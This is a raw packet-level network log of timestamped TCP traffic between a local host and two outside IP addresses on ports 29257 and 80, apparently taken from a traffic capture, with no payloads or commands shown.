Aug 26, 2024 23:29:27.179258108 CEST	29257	49728	95.179.163.21	192.168.2.7
Aug 26, 2024 23:29:27.179266930 CEST	29257	49728	95.179.163.21	192.168.2.7
Aug 26, 2024 23:29:27.179275036 CEST	29257	49728	95.179.163.21	192.168.2.7
Aug 26, 2024 23:29:27.179305077 CEST	29257	49728	95.179.163.21	192.168.2.7
Aug 26, 2024 23:29:27.179394960 CEST	29257	49728	95.179.163.21	192.168.2.7
Aug 26, 2024 23:29:27.179404020 CEST	29257	49728	95.179.163.21	192.168.2.7
Aug 26, 2024 23:29:27.179413080 CEST	29257	49728	95.179.163.21	192.168.2.7
Aug 26, 2024 23:29:27.179421902 CEST	29257	49728	95.179.163.21	192.168.2.7
Aug 26, 2024 23:29:27.179425001 CEST	29257	49728	95.179.163.21	192.168.2.7
Aug 26, 2024 23:29:27.179481983 CEST	29257	49728	95.179.163.21	192.168.2.7
Aug 26, 2024 23:29:27.179514885 CEST	29257	49728	95.179.163.21	192.168.2.7
Aug 26, 2024 23:29:27.179548979 CEST	29257	49728	95.179.163.21	192.168.2.7
Aug 26, 2024 23:29:27.179558039 CEST	29257	49728	95.179.163.21	192.168.2.7
Aug 26, 2024 23:29:27.179600000 CEST	29257	49728	95.179.163.21	192.168.2.7
Aug 26, 2024 23:29:27.179678917 CEST	29257	49728	95.179.163.21	192.168.2.7
Aug 26, 2024 23:29:27.179687977 CEST	29257	49728	95.179.163.21	192.168.2.7
Aug 26, 2024 23:29:27.179696083 CEST	29257	49728	95.179.163.21	192.168.2.7
Aug 26, 2024 23:29:27.179750919 CEST	29257	49728	95.179.163.21	192.168.2.7
Aug 26, 2024 23:29:27.179817915 CEST	29257	49728	95.179.163.21	192.168.2.7
Aug 26, 2024 23:29:27.179826975 CEST	29257	49728	95.179.163.21	192.168.2.7
Aug 26, 2024 23:29:27.179836988 CEST	29257	49728	95.179.163.21	192.168.2.7
Aug 26, 2024 23:29:27.179894924 CEST	29257	49728	95.179.163.21	192.168.2.7
Aug 26, 2024 23:29:27.179904938 CEST	29257	49728	95.179.163.21	192.168.2.7
Aug 26, 2024 23:29:27.180032015 CEST	29257	49728	95.179.163.21	192.168.2.7
Aug 26, 2024 23:29:27.180041075 CEST	29257	49728	95.179.163.21	192.168.2.7
Aug 26, 2024 23:29:27.180048943 CEST	29257	49728	95.179.163.21	192.168.2.7
Aug 26, 2024 23:29:27.180058002 CEST	29257	49728	95.179.163.21	192.168.2.7
Aug 26, 2024 23:29:27.180624008 CEST	29257	49728	95.179.163.21	192.168.2.7
Aug 26, 2024 23:29:27.180633068 CEST	29257	49728	95.179.163.21	192.168.2.7
Aug 26, 2024 23:29:27.180640936 CEST	29257	49728	95.179.163.21	192.168.2.7
Aug 26, 2024 23:29:27.180843115 CEST	49728	29257	192.168.2.7	95.179.163.21
Aug 26, 2024 23:29:27.180932999 CEST	49728	29257	192.168.2.7	95.179.163.21
Aug 26, 2024 23:29:27.183877945 CEST	29257	49728	95.179.163.21	192.168.2.7
Aug 26, 2024 23:29:27.183936119 CEST	29257	49728	95.179.163.21	192.168.2.7
Aug 26, 2024 23:29:27.183945894 CEST	29257	49728	95.179.163.21	192.168.2.7
Aug 26, 2024 23:29:27.183954954 CEST	29257	49728	95.179.163.21	192.168.2.7
Aug 26, 2024 23:29:27.183995962 CEST	29257	49728	95.179.163.21	192.168.2.7
Aug 26, 2024 23:29:27.184043884 CEST	29257	49728	95.179.163.21	192.168.2.7
Aug 26, 2024 23:29:27.184092999 CEST	29257	49728	95.179.163.21	192.168.2.7
Aug 26, 2024 23:29:27.184170008 CEST	29257	49728	95.179.163.21	192.168.2.7
Aug 26, 2024 23:29:27.184180021 CEST	29257	49728	95.179.163.21	192.168.2.7
Aug 26, 2024 23:29:27.184190035 CEST	29257	49728	95.179.163.21	192.168.2.7
Aug 26, 2024 23:29:27.184297085 CEST	29257	49728	95.179.163.21	192.168.2.7
Aug 26, 2024 23:29:27.184356928 CEST	29257	49728	95.179.163.21	192.168.2.7
Aug 26, 2024 23:29:27.184365988 CEST	29257	49728	95.179.163.21	192.168.2.7
Aug 26, 2024 23:29:27.184375048 CEST	29257	49728	95.179.163.21	192.168.2.7
Aug 26, 2024 23:29:27.184420109 CEST	29257	49728	95.179.163.21	192.168.2.7
Aug 26, 2024 23:29:27.184472084 CEST	29257	49728	95.179.163.21	192.168.2.7
Aug 26, 2024 23:29:27.184484959 CEST	29257	49728	95.179.163.21	192.168.2.7
Aug 26, 2024 23:29:27.184495926 CEST	29257	49728	95.179.163.21	192.168.2.7
Aug 26, 2024 23:29:27.184509993 CEST	29257	49728	95.179.163.21	192.168.2.7
Aug 26, 2024 23:29:27.184519053 CEST	29257	49728	95.179.163.21	192.168.2.7
Aug 26, 2024 23:29:27.184595108 CEST	29257	49728	95.179.163.21	192.168.2.7
Aug 26, 2024 23:29:27.184603930 CEST	29257	49728	95.179.163.21	192.168.2.7
Aug 26, 2024 23:29:27.184638023 CEST	29257	49728	95.179.163.21	192.168.2.7
Aug 26, 2024 23:29:27.184714079 CEST	29257	49728	95.179.163.21	192.168.2.7
Aug 26, 2024 23:29:27.184722900 CEST	29257	49728	95.179.163.21	192.168.2.7
Aug 26, 2024 23:29:27.184731007 CEST	29257	49728	95.179.163.21	192.168.2.7
Aug 26, 2024 23:29:27.184767008 CEST	29257	49728	95.179.163.21	192.168.2.7
Aug 26, 2024 23:29:27.184777021 CEST	29257	49728	95.179.163.21	192.168.2.7
Aug 26, 2024 23:29:27.184859037 CEST	29257	49728	95.179.163.21	192.168.2.7
Aug 26, 2024 23:29:27.184869051 CEST	29257	49728	95.179.163.21	192.168.2.7
Aug 26, 2024 23:29:27.184878111 CEST	29257	49728	95.179.163.21	192.168.2.7
Aug 26, 2024 23:29:27.184886932 CEST	29257	49728	95.179.163.21	192.168.2.7
Aug 26, 2024 23:29:27.184989929 CEST	29257	49728	95.179.163.21	192.168.2.7
Aug 26, 2024 23:29:27.184998989 CEST	29257	49728	95.179.163.21	192.168.2.7
Aug 26, 2024 23:29:27.185005903 CEST	29257	49728	95.179.163.21	192.168.2.7
Aug 26, 2024 23:29:27.185014009 CEST	29257	49728	95.179.163.21	192.168.2.7
Aug 26, 2024 23:29:27.185023069 CEST	29257	49728	95.179.163.21	192.168.2.7
Aug 26, 2024 23:29:27.185125113 CEST	29257	49728	95.179.163.21	192.168.2.7
Aug 26, 2024 23:29:27.185133934 CEST	29257	49728	95.179.163.21	192.168.2.7
Aug 26, 2024 23:29:27.185142994 CEST	29257	49728	95.179.163.21	192.168.2.7
Aug 26, 2024 23:29:27.185152054 CEST	29257	49728	95.179.163.21	192.168.2.7
Aug 26, 2024 23:29:27.185158968 CEST	29257	49728	95.179.163.21	192.168.2.7
Aug 26, 2024 23:29:27.185237885 CEST	29257	49728	95.179.163.21	192.168.2.7
Aug 26, 2024 23:29:27.185246944 CEST	29257	49728	95.179.163.21	192.168.2.7
Aug 26, 2024 23:29:27.185254097 CEST	29257	49728	95.179.163.21	192.168.2.7
Aug 26, 2024 23:29:27.185257912 CEST	29257	49728	95.179.163.21	192.168.2.7
Aug 26, 2024 23:29:27.185266018 CEST	29257	49728	95.179.163.21	192.168.2.7
Aug 26, 2024 23:29:27.185273886 CEST	29257	49728	95.179.163.21	192.168.2.7
Aug 26, 2024 23:29:27.185395002 CEST	29257	49728	95.179.163.21	192.168.2.7
Aug 26, 2024 23:29:27.185405016 CEST	29257	49728	95.179.163.21	192.168.2.7
Aug 26, 2024 23:29:27.185412884 CEST	29257	49728	95.179.163.21	192.168.2.7
Aug 26, 2024 23:29:27.185420990 CEST	29257	49728	95.179.163.21	192.168.2.7
Aug 26, 2024 23:29:27.185430050 CEST	29257	49728	95.179.163.21	192.168.2.7
Aug 26, 2024 23:29:27.185745001 CEST	29257	49728	95.179.163.21	192.168.2.7
Aug 26, 2024 23:29:27.185760021 CEST	29257	49728	95.179.163.21	192.168.2.7
Aug 26, 2024 23:29:27.185951948 CEST	29257	49728	95.179.163.21	192.168.2.7
Aug 26, 2024 23:29:27.185973883 CEST	29257	49728	95.179.163.21	192.168.2.7
Aug 26, 2024 23:29:27.185982943 CEST	29257	49728	95.179.163.21	192.168.2.7
Aug 26, 2024 23:29:27.186007023 CEST	29257	49728	95.179.163.21	192.168.2.7
Aug 26, 2024 23:29:27.186033964 CEST	29257	49728	95.179.163.21	192.168.2.7
Aug 26, 2024 23:29:27.186043024 CEST	29257	49728	95.179.163.21	192.168.2.7
Aug 26, 2024 23:29:27.186083078 CEST	49728	29257	192.168.2.7	95.179.163.21
Aug 26, 2024 23:29:27.186129093 CEST	29257	49728	95.179.163.21	192.168.2.7
Aug 26, 2024 23:29:27.186137915 CEST	29257	49728	95.179.163.21	192.168.2.7
Aug 26, 2024 23:29:27.186163902 CEST	49728	29257	192.168.2.7	95.179.163.21
Aug 26, 2024 23:29:27.186172962 CEST	29257	49728	95.179.163.21	192.168.2.7
Aug 26, 2024 23:29:27.186182976 CEST	29257	49728	95.179.163.21	192.168.2.7
Aug 26, 2024 23:29:27.186238050 CEST	29257	49728	95.179.163.21	192.168.2.7
Aug 26, 2024 23:29:27.186247110 CEST	29257	49728	95.179.163.21	192.168.2.7
Aug 26, 2024 23:29:27.186275005 CEST	29257	49728	95.179.163.21	192.168.2.7
Aug 26, 2024 23:29:27.186342955 CEST	29257	49728	95.179.163.21	192.168.2.7
Aug 26, 2024 23:29:27.186352968 CEST	29257	49728	95.179.163.21	192.168.2.7
Aug 26, 2024 23:29:27.186372042 CEST	29257	49728	95.179.163.21	192.168.2.7
Aug 26, 2024 23:29:27.186408043 CEST	29257	49728	95.179.163.21	192.168.2.7
Aug 26, 2024 23:29:27.186417103 CEST	29257	49728	95.179.163.21	192.168.2.7
Aug 26, 2024 23:29:27.186479092 CEST	29257	49728	95.179.163.21	192.168.2.7
Aug 26, 2024 23:29:27.186486959 CEST	29257	49728	95.179.163.21	192.168.2.7
Aug 26, 2024 23:29:27.186506033 CEST	29257	49728	95.179.163.21	192.168.2.7
Aug 26, 2024 23:29:27.186559916 CEST	29257	49728	95.179.163.21	192.168.2.7
Aug 26, 2024 23:29:27.186568975 CEST	29257	49728	95.179.163.21	192.168.2.7
Aug 26, 2024 23:29:27.186579943 CEST	29257	49728	95.179.163.21	192.168.2.7
Aug 26, 2024 23:29:27.186608076 CEST	29257	49728	95.179.163.21	192.168.2.7
Aug 26, 2024 23:29:27.186610937 CEST	29257	49728	95.179.163.21	192.168.2.7
Aug 26, 2024 23:29:27.186711073 CEST	29257	49728	95.179.163.21	192.168.2.7
Aug 26, 2024 23:29:27.186773062 CEST	29257	49728	95.179.163.21	192.168.2.7
Aug 26, 2024 23:29:27.186781883 CEST	29257	49728	95.179.163.21	192.168.2.7
Aug 26, 2024 23:29:27.186789036 CEST	29257	49728	95.179.163.21	192.168.2.7
Aug 26, 2024 23:29:27.186805010 CEST	29257	49728	95.179.163.21	192.168.2.7
Aug 26, 2024 23:29:27.186888933 CEST	29257	49728	95.179.163.21	192.168.2.7
Aug 26, 2024 23:29:27.186898947 CEST	29257	49728	95.179.163.21	192.168.2.7
Aug 26, 2024 23:29:27.186906099 CEST	29257	49728	95.179.163.21	192.168.2.7
Aug 26, 2024 23:29:27.186939001 CEST	29257	49728	95.179.163.21	192.168.2.7
Aug 26, 2024 23:29:27.186948061 CEST	29257	49728	95.179.163.21	192.168.2.7
Aug 26, 2024 23:29:27.186955929 CEST	29257	49728	95.179.163.21	192.168.2.7
Aug 26, 2024 23:29:27.186999083 CEST	29257	49728	95.179.163.21	192.168.2.7
Aug 26, 2024 23:29:27.187009096 CEST	29257	49728	95.179.163.21	192.168.2.7
Aug 26, 2024 23:29:27.187046051 CEST	29257	49728	95.179.163.21	192.168.2.7
Aug 26, 2024 23:29:27.187055111 CEST	29257	49728	95.179.163.21	192.168.2.7
Aug 26, 2024 23:29:27.187062979 CEST	29257	49728	95.179.163.21	192.168.2.7
Aug 26, 2024 23:29:27.187176943 CEST	29257	49728	95.179.163.21	192.168.2.7
Aug 26, 2024 23:29:27.187186003 CEST	29257	49728	95.179.163.21	192.168.2.7
Aug 26, 2024 23:29:27.187192917 CEST	29257	49728	95.179.163.21	192.168.2.7
Aug 26, 2024 23:29:27.187202930 CEST	29257	49728	95.179.163.21	192.168.2.7
Aug 26, 2024 23:29:27.187218904 CEST	29257	49728	95.179.163.21	192.168.2.7
Aug 26, 2024 23:29:27.187227011 CEST	29257	49728	95.179.163.21	192.168.2.7
Aug 26, 2024 23:29:27.187236071 CEST	29257	49728	95.179.163.21	192.168.2.7
Aug 26, 2024 23:29:27.187275887 CEST	29257	49728	95.179.163.21	192.168.2.7
Aug 26, 2024 23:29:27.187284946 CEST	29257	49728	95.179.163.21	192.168.2.7
Aug 26, 2024 23:29:27.187591076 CEST	29257	49728	95.179.163.21	192.168.2.7
Aug 26, 2024 23:29:27.187896967 CEST	49728	29257	192.168.2.7	95.179.163.21
Aug 26, 2024 23:29:27.187969923 CEST	49728	29257	192.168.2.7	95.179.163.21
Aug 26, 2024 23:29:27.191009045 CEST	29257	49728	95.179.163.21	192.168.2.7
Aug 26, 2024 23:29:27.191164017 CEST	29257	49728	95.179.163.21	192.168.2.7
Aug 26, 2024 23:29:27.191229105 CEST	29257	49728	95.179.163.21	192.168.2.7
Aug 26, 2024 23:29:27.191272974 CEST	29257	49728	95.179.163.21	192.168.2.7
Aug 26, 2024 23:29:27.191282988 CEST	29257	49728	95.179.163.21	192.168.2.7
Aug 26, 2024 23:29:27.191385031 CEST	29257	49728	95.179.163.21	192.168.2.7
Aug 26, 2024 23:29:27.191473007 CEST	29257	49728	95.179.163.21	192.168.2.7
Aug 26, 2024 23:29:27.191500902 CEST	29257	49728	95.179.163.21	192.168.2.7
Aug 26, 2024 23:29:27.191509962 CEST	29257	49728	95.179.163.21	192.168.2.7
Aug 26, 2024 23:29:27.191559076 CEST	29257	49728	95.179.163.21	192.168.2.7
Aug 26, 2024 23:29:27.191586971 CEST	29257	49728	95.179.163.21	192.168.2.7
Aug 26, 2024 23:29:27.191596031 CEST	29257	49728	95.179.163.21	192.168.2.7
Aug 26, 2024 23:29:27.191612005 CEST	29257	49728	95.179.163.21	192.168.2.7
Aug 26, 2024 23:29:27.192157984 CEST	29257	49728	95.179.163.21	192.168.2.7
Aug 26, 2024 23:29:27.192224979 CEST	29257	49728	95.179.163.21	192.168.2.7
Aug 26, 2024 23:29:27.192234993 CEST	29257	49728	95.179.163.21	192.168.2.7
Aug 26, 2024 23:29:27.192245960 CEST	29257	49728	95.179.163.21	192.168.2.7
Aug 26, 2024 23:29:27.192342997 CEST	29257	49728	95.179.163.21	192.168.2.7
Aug 26, 2024 23:29:27.192352057 CEST	29257	49728	95.179.163.21	192.168.2.7
Aug 26, 2024 23:29:27.192387104 CEST	29257	49728	95.179.163.21	192.168.2.7
Aug 26, 2024 23:29:27.192439079 CEST	29257	49728	95.179.163.21	192.168.2.7
Aug 26, 2024 23:29:27.192447901 CEST	29257	49728	95.179.163.21	192.168.2.7
Aug 26, 2024 23:29:27.192459106 CEST	29257	49728	95.179.163.21	192.168.2.7
Aug 26, 2024 23:29:27.192476034 CEST	29257	49728	95.179.163.21	192.168.2.7
Aug 26, 2024 23:29:27.192491055 CEST	29257	49728	95.179.163.21	192.168.2.7
Aug 26, 2024 23:29:27.192517042 CEST	29257	49728	95.179.163.21	192.168.2.7
Aug 26, 2024 23:29:27.192642927 CEST	29257	49728	95.179.163.21	192.168.2.7
Aug 26, 2024 23:29:27.192652941 CEST	29257	49728	95.179.163.21	192.168.2.7
Aug 26, 2024 23:29:27.192661047 CEST	29257	49728	95.179.163.21	192.168.2.7
Aug 26, 2024 23:29:27.192667007 CEST	29257	49728	95.179.163.21	192.168.2.7
Aug 26, 2024 23:29:27.192670107 CEST	29257	49728	95.179.163.21	192.168.2.7
Aug 26, 2024 23:29:27.192773104 CEST	29257	49728	95.179.163.21	192.168.2.7
Aug 26, 2024 23:29:27.192780972 CEST	29257	49728	95.179.163.21	192.168.2.7
Aug 26, 2024 23:29:27.192790031 CEST	29257	49728	95.179.163.21	192.168.2.7
Aug 26, 2024 23:29:27.192804098 CEST	29257	49728	95.179.163.21	192.168.2.7
Aug 26, 2024 23:29:27.192954063 CEST	29257	49728	95.179.163.21	192.168.2.7
Aug 26, 2024 23:29:27.192964077 CEST	29257	49728	95.179.163.21	192.168.2.7
Aug 26, 2024 23:29:27.193073034 CEST	29257	49728	95.179.163.21	192.168.2.7
Aug 26, 2024 23:29:27.193082094 CEST	29257	49728	95.179.163.21	192.168.2.7
Aug 26, 2024 23:29:27.193090916 CEST	29257	49728	95.179.163.21	192.168.2.7
Aug 26, 2024 23:29:27.193099976 CEST	29257	49728	95.179.163.21	192.168.2.7
Aug 26, 2024 23:29:27.193116903 CEST	29257	49728	95.179.163.21	192.168.2.7
Aug 26, 2024 23:29:27.193125010 CEST	29257	49728	95.179.163.21	192.168.2.7
Aug 26, 2024 23:29:27.193135023 CEST	29257	49728	95.179.163.21	192.168.2.7
Aug 26, 2024 23:29:27.193144083 CEST	29257	49728	95.179.163.21	192.168.2.7
Aug 26, 2024 23:29:27.193263054 CEST	29257	49728	95.179.163.21	192.168.2.7
Aug 26, 2024 23:29:27.193315029 CEST	29257	49728	95.179.163.21	192.168.2.7
Aug 26, 2024 23:29:27.193380117 CEST	29257	49728	95.179.163.21	192.168.2.7
Aug 26, 2024 23:29:27.193389893 CEST	29257	49728	95.179.163.21	192.168.2.7
Aug 26, 2024 23:29:27.193460941 CEST	29257	49728	95.179.163.21	192.168.2.7
Aug 26, 2024 23:29:27.193578005 CEST	29257	49728	95.179.163.21	192.168.2.7
Aug 26, 2024 23:29:27.193588018 CEST	29257	49728	95.179.163.21	192.168.2.7
Aug 26, 2024 23:29:27.193595886 CEST	29257	49728	95.179.163.21	192.168.2.7
Aug 26, 2024 23:29:27.193620920 CEST	29257	49728	95.179.163.21	192.168.2.7
Aug 26, 2024 23:29:27.193746090 CEST	29257	49728	95.179.163.21	192.168.2.7
Aug 26, 2024 23:29:27.193756104 CEST	29257	49728	95.179.163.21	192.168.2.7
Aug 26, 2024 23:29:27.193763971 CEST	29257	49728	95.179.163.21	192.168.2.7
Aug 26, 2024 23:29:27.193773031 CEST	29257	49728	95.179.163.21	192.168.2.7
Aug 26, 2024 23:29:27.193782091 CEST	29257	49728	95.179.163.21	192.168.2.7
Aug 26, 2024 23:29:27.193792105 CEST	29257	49728	95.179.163.21	192.168.2.7
Aug 26, 2024 23:29:27.193862915 CEST	29257	49728	95.179.163.21	192.168.2.7
Aug 26, 2024 23:29:27.193871975 CEST	29257	49728	95.179.163.21	192.168.2.7
Aug 26, 2024 23:29:27.193880081 CEST	29257	49728	95.179.163.21	192.168.2.7
Aug 26, 2024 23:29:27.193890095 CEST	29257	49728	95.179.163.21	192.168.2.7
Aug 26, 2024 23:29:27.193901062 CEST	29257	49728	95.179.163.21	192.168.2.7
Aug 26, 2024 23:29:27.193922043 CEST	49728	29257	192.168.2.7	95.179.163.21
Aug 26, 2024 23:29:27.193968058 CEST	29257	49728	95.179.163.21	192.168.2.7
Aug 26, 2024 23:29:27.194010973 CEST	49728	29257	192.168.2.7	95.179.163.21
Aug 26, 2024 23:29:27.194021940 CEST	29257	49728	95.179.163.21	192.168.2.7
Aug 26, 2024 23:29:27.194031954 CEST	29257	49728	95.179.163.21	192.168.2.7
Aug 26, 2024 23:29:27.194041014 CEST	29257	49728	95.179.163.21	192.168.2.7
Aug 26, 2024 23:29:27.194148064 CEST	29257	49728	95.179.163.21	192.168.2.7
Aug 26, 2024 23:29:27.194158077 CEST	29257	49728	95.179.163.21	192.168.2.7
Aug 26, 2024 23:29:27.201837063 CEST	29257	49728	95.179.163.21	192.168.2.7
Aug 26, 2024 23:29:27.202205896 CEST	49728	29257	192.168.2.7	95.179.163.21
Aug 26, 2024 23:29:27.207235098 CEST	29257	49728	95.179.163.21	192.168.2.7
Aug 26, 2024 23:29:27.207297087 CEST	29257	49728	95.179.163.21	192.168.2.7
Aug 26, 2024 23:29:27.207308054 CEST	29257	49728	95.179.163.21	192.168.2.7
Aug 26, 2024 23:29:27.207318068 CEST	29257	49728	95.179.163.21	192.168.2.7
Aug 26, 2024 23:29:27.207381010 CEST	29257	49728	95.179.163.21	192.168.2.7
Aug 26, 2024 23:29:27.207391024 CEST	29257	49728	95.179.163.21	192.168.2.7
Aug 26, 2024 23:29:27.207423925 CEST	29257	49728	95.179.163.21	192.168.2.7
Aug 26, 2024 23:29:27.207494020 CEST	29257	49728	95.179.163.21	192.168.2.7
Aug 26, 2024 23:29:27.207503080 CEST	29257	49728	95.179.163.21	192.168.2.7
Aug 26, 2024 23:29:27.207511902 CEST	29257	49728	95.179.163.21	192.168.2.7
Aug 26, 2024 23:29:27.207521915 CEST	29257	49728	95.179.163.21	192.168.2.7
Aug 26, 2024 23:29:27.207531929 CEST	29257	49728	95.179.163.21	192.168.2.7
Aug 26, 2024 23:29:27.207616091 CEST	29257	49728	95.179.163.21	192.168.2.7
Aug 26, 2024 23:29:27.207669973 CEST	29257	49728	95.179.163.21	192.168.2.7
Aug 26, 2024 23:29:27.207679033 CEST	29257	49728	95.179.163.21	192.168.2.7
Aug 26, 2024 23:29:27.207686901 CEST	29257	49728	95.179.163.21	192.168.2.7
Aug 26, 2024 23:29:27.208358049 CEST	29257	49728	95.179.163.21	192.168.2.7
Aug 26, 2024 23:29:27.214668989 CEST	80	49738	185.215.113.16	192.168.2.7
Aug 26, 2024 23:29:27.214682102 CEST	80	49738	185.215.113.16	192.168.2.7
Aug 26, 2024 23:29:27.214744091 CEST	49738	80	192.168.2.7	185.215.113.16
Aug 26, 2024 23:29:27.214943886 CEST	80	49738	185.215.113.16	192.168.2.7
Aug 26, 2024 23:29:27.214956999 CEST	80	49738	185.215.113.16	192.168.2.7
Aug 26, 2024 23:29:27.214967966 CEST	80	49738	185.215.113.16	192.168.2.7
Aug 26, 2024 23:29:27.214999914 CEST	80	49738	185.215.113.16	192.168.2.7
Aug 26, 2024 23:29:27.215006113 CEST	49738	80	192.168.2.7	185.215.113.16
Aug 26, 2024 23:29:27.215010881 CEST	80	49738	185.215.113.16	192.168.2.7
Aug 26, 2024 23:29:27.215023994 CEST	80	49738	185.215.113.16	192.168.2.7
Aug 26, 2024 23:29:27.215030909 CEST	49738	80	192.168.2.7	185.215.113.16
Aug 26, 2024 23:29:27.215065002 CEST	49738	80	192.168.2.7	185.215.113.16
Aug 26, 2024 23:29:27.215152979 CEST	80	49738	185.215.113.16	192.168.2.7
Aug 26, 2024 23:29:27.215163946 CEST	80	49738	185.215.113.16	192.168.2.7
Aug 26, 2024 23:29:27.215174913 CEST	80	49738	185.215.113.16	192.168.2.7
Aug 26, 2024 23:29:27.215186119 CEST	80	49738	185.215.113.16	192.168.2.7
Aug 26, 2024 23:29:27.215192080 CEST	49738	80	192.168.2.7	185.215.113.16
Aug 26, 2024 23:29:27.215198040 CEST	80	49738	185.215.113.16	192.168.2.7
Aug 26, 2024 23:29:27.215223074 CEST	49738	80	192.168.2.7	185.215.113.16
Aug 26, 2024 23:29:27.215248108 CEST	49738	80	192.168.2.7	185.215.113.16
Aug 26, 2024 23:29:27.215322018 CEST	80	49738	185.215.113.16	192.168.2.7
Aug 26, 2024 23:29:27.215364933 CEST	80	49738	185.215.113.16	192.168.2.7
Aug 26, 2024 23:29:27.215374947 CEST	80	49738	185.215.113.16	192.168.2.7
Aug 26, 2024 23:29:27.215384960 CEST	80	49738	185.215.113.16	192.168.2.7
Aug 26, 2024 23:29:27.215405941 CEST	49738	80	192.168.2.7	185.215.113.16
Aug 26, 2024 23:29:27.215429068 CEST	49738	80	192.168.2.7	185.215.113.16
Aug 26, 2024 23:29:27.215449095 CEST	80	49738	185.215.113.16	192.168.2.7
Aug 26, 2024 23:29:27.215460062 CEST	80	49738	185.215.113.16	192.168.2.7
Aug 26, 2024 23:29:27.215468884 CEST	80	49738	185.215.113.16	192.168.2.7
Aug 26, 2024 23:29:27.215480089 CEST	80	49738	185.215.113.16	192.168.2.7
Aug 26, 2024 23:29:27.215487003 CEST	49738	80	192.168.2.7	185.215.113.16
Aug 26, 2024 23:29:27.215498924 CEST	49738	80	192.168.2.7	185.215.113.16
Aug 26, 2024 23:29:27.215526104 CEST	49738	80	192.168.2.7	185.215.113.16
Aug 26, 2024 23:29:27.215703964 CEST	80	49738	185.215.113.16	192.168.2.7
Aug 26, 2024 23:29:27.215714931 CEST	80	49738	185.215.113.16	192.168.2.7
Aug 26, 2024 23:29:27.215724945 CEST	80	49738	185.215.113.16	192.168.2.7
Aug 26, 2024 23:29:27.215735912 CEST	80	49738	185.215.113.16	192.168.2.7
Aug 26, 2024 23:29:27.215739012 CEST	49738	80	192.168.2.7	185.215.113.16
Aug 26, 2024 23:29:27.215759039 CEST	49738	80	192.168.2.7	185.215.113.16
Aug 26, 2024 23:29:27.215784073 CEST	49738	80	192.168.2.7	185.215.113.16
Aug 26, 2024 23:29:27.215795994 CEST	80	49738	185.215.113.16	192.168.2.7
Aug 26, 2024 23:29:27.215806961 CEST	80	49738	185.215.113.16	192.168.2.7
Aug 26, 2024 23:29:27.215817928 CEST	80	49738	185.215.113.16	192.168.2.7
Aug 26, 2024 23:29:27.215828896 CEST	80	49738	185.215.113.16	192.168.2.7
Aug 26, 2024 23:29:27.215832949 CEST	49738	80	192.168.2.7	185.215.113.16
Aug 26, 2024 23:29:27.215842009 CEST	80	49738	185.215.113.16	192.168.2.7
Aug 26, 2024 23:29:27.215852976 CEST	49738	80	192.168.2.7	185.215.113.16
Aug 26, 2024 23:29:27.215878963 CEST	49738	80	192.168.2.7	185.215.113.16
Aug 26, 2024 23:29:27.216191053 CEST	80	49738	185.215.113.16	192.168.2.7
Aug 26, 2024 23:29:27.216259956 CEST	80	49738	185.215.113.16	192.168.2.7
Aug 26, 2024 23:29:27.216272116 CEST	80	49738	185.215.113.16	192.168.2.7
Aug 26, 2024 23:29:27.216283083 CEST	80	49738	185.215.113.16	192.168.2.7
Aug 26, 2024 23:29:27.216294050 CEST	80	49738	185.215.113.16	192.168.2.7
Aug 26, 2024 23:29:27.216298103 CEST	49738	80	192.168.2.7	185.215.113.16
Aug 26, 2024 23:29:27.216311932 CEST	49738	80	192.168.2.7	185.215.113.16
Aug 26, 2024 23:29:27.216341019 CEST	49738	80	192.168.2.7	185.215.113.16
Aug 26, 2024 23:29:27.216506004 CEST	80	49738	185.215.113.16	192.168.2.7
Aug 26, 2024 23:29:27.216742039 CEST	80	49738	185.215.113.16	192.168.2.7
Aug 26, 2024 23:29:27.216753006 CEST	80	49738	185.215.113.16	192.168.2.7
Aug 26, 2024 23:29:27.216789961 CEST	49738	80	192.168.2.7	185.215.113.16
Aug 26, 2024 23:29:27.216801882 CEST	80	49738	185.215.113.16	192.168.2.7
Aug 26, 2024 23:29:27.216814041 CEST	80	49738	185.215.113.16	192.168.2.7
Aug 26, 2024 23:29:27.216823101 CEST	80	49738	185.215.113.16	192.168.2.7
Aug 26, 2024 23:29:27.216835022 CEST	80	49738	185.215.113.16	192.168.2.7
Aug 26, 2024 23:29:27.216841936 CEST	49738	80	192.168.2.7	185.215.113.16
Aug 26, 2024 23:29:27.216846943 CEST	80	49738	185.215.113.16	192.168.2.7
Aug 26, 2024 23:29:27.216857910 CEST	80	49738	185.215.113.16	192.168.2.7
Aug 26, 2024 23:29:27.216862917 CEST	49738	80	192.168.2.7	185.215.113.16
Aug 26, 2024 23:29:27.216870070 CEST	80	49738	185.215.113.16	192.168.2.7
Aug 26, 2024 23:29:27.216892958 CEST	49738	80	192.168.2.7	185.215.113.16
Aug 26, 2024 23:29:27.216916084 CEST	49738	80	192.168.2.7	185.215.113.16
Aug 26, 2024 23:29:27.216943979 CEST	80	49738	185.215.113.16	192.168.2.7
Aug 26, 2024 23:29:27.216954947 CEST	80	49738	185.215.113.16	192.168.2.7
Aug 26, 2024 23:29:27.216964960 CEST	80	49738	185.215.113.16	192.168.2.7
Aug 26, 2024 23:29:27.216975927 CEST	80	49738	185.215.113.16	192.168.2.7
Aug 26, 2024 23:29:27.216986895 CEST	80	49738	185.215.113.16	192.168.2.7
Aug 26, 2024 23:29:27.216988087 CEST	49738	80	192.168.2.7	185.215.113.16
Aug 26, 2024 23:29:27.217021942 CEST	49738	80	192.168.2.7	185.215.113.16
Aug 26, 2024 23:29:27.217415094 CEST	80	49738	185.215.113.16	192.168.2.7
Aug 26, 2024 23:29:27.217427015 CEST	80	49738	185.215.113.16	192.168.2.7
Aug 26, 2024 23:29:27.217437029 CEST	80	49738	185.215.113.16	192.168.2.7
Aug 26, 2024 23:29:27.217458010 CEST	49738	80	192.168.2.7	185.215.113.16
Aug 26, 2024 23:29:27.217474937 CEST	80	49738	185.215.113.16	192.168.2.7
Aug 26, 2024 23:29:27.217477083 CEST	49738	80	192.168.2.7	185.215.113.16
Aug 26, 2024 23:29:27.217485905 CEST	80	49738	185.215.113.16	192.168.2.7
Aug 26, 2024 23:29:27.217497110 CEST	80	49738	185.215.113.16	192.168.2.7
Aug 26, 2024 23:29:27.217508078 CEST	80	49738	185.215.113.16	192.168.2.7
Aug 26, 2024 23:29:27.217515945 CEST	49738	80	192.168.2.7	185.215.113.16
Aug 26, 2024 23:29:27.217530012 CEST	49738	80	192.168.2.7	185.215.113.16
Aug 26, 2024 23:29:27.217556000 CEST	49738	80	192.168.2.7	185.215.113.16
Aug 26, 2024 23:29:27.217605114 CEST	80	49738	185.215.113.16	192.168.2.7
Aug 26, 2024 23:29:27.217616081 CEST	80	49738	185.215.113.16	192.168.2.7
Aug 26, 2024 23:29:27.217627048 CEST	80	49738	185.215.113.16	192.168.2.7
